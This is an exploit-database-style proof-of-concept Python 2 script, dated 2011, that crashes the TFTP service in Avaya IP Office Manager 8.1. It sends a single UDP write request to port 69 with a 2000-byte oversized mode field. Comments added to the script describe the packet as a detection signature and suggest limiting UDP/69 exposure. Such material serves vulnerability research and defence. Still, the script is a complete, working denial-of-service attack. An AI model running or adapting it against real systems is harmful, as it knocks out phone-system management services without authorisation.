#Exploit Title: Avaya IP Office Manager TFTP DOS
#Version: Avaya IP Office Manager 8.1 (5)
#Author: Craig Freyman (cd1zz)
#Date: March 23, 2011
#Description: Avaya IP Office Manager is the management console for Avaya IP Office phone systems.
#There is a built-in TFTP server that is used to update the firmware on phones. The TFTP service
#is loaded when the admin console is opened. I was not able to overwrite any registers or the SEH.
#Software Link: ftp://ftp.avaya.com/incoming/Up1cku9/SoftwarePub/6_1GA_Builds/ADMIN6_1_5.exe
#Tested on: Windows XP SP3
#!/usr/bin/python
# Proof-of-concept for the TFTP service crash described in the header above.
# Written for Python 2 (print statement, str used directly as the UDP payload).
#
# What goes on the wire, for anyone writing a detection or a regression test:
#   a single UDP datagram to port 69, laid out like an RFC 1350 request
#       2-byte opcode | filename | NUL | mode | NUL
#   with opcode 0x0002 (write request), filename "A", and 2000 bytes of "A"
#   in the position of the mode string. RFC 1350 defines only the modes
#   "netascii", "octet" and "mail", so a request whose mode field is none of
#   those, or is far longer than them, is a usable signature for this traffic.
#
# NOTE(review): the header reports no register or SEH overwrite, but which
#   parsing step fails is not shown here -- treat the crash as unanalysed
#   memory corruption rather than as proven DoS-only.
# NOTE(review): per the header the TFTP service is only loaded while the admin
#   console is open; limiting inbound UDP/69 on the admin workstation to the
#   phones that need firmware updates reduces exposure -- confirm against the
#   deployment.

import socket

TFTP_PORT = 69
# Private (RFC 1918) address hard-coded by the author.
target = ('192.168.133.131', TFTP_PORT)

OPCODE_WRQ = "\x00\x02"
filename = "A"
oversized_mode = "A" * 2000

# opcode, filename, NUL terminator, oversized mode field, NUL terminator
datagram = "".join([OPCODE_WRQ, filename, "\x00", oversized_mode, "\x00"])

udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

print "Sending crash...."
udp.sendto(datagram, target)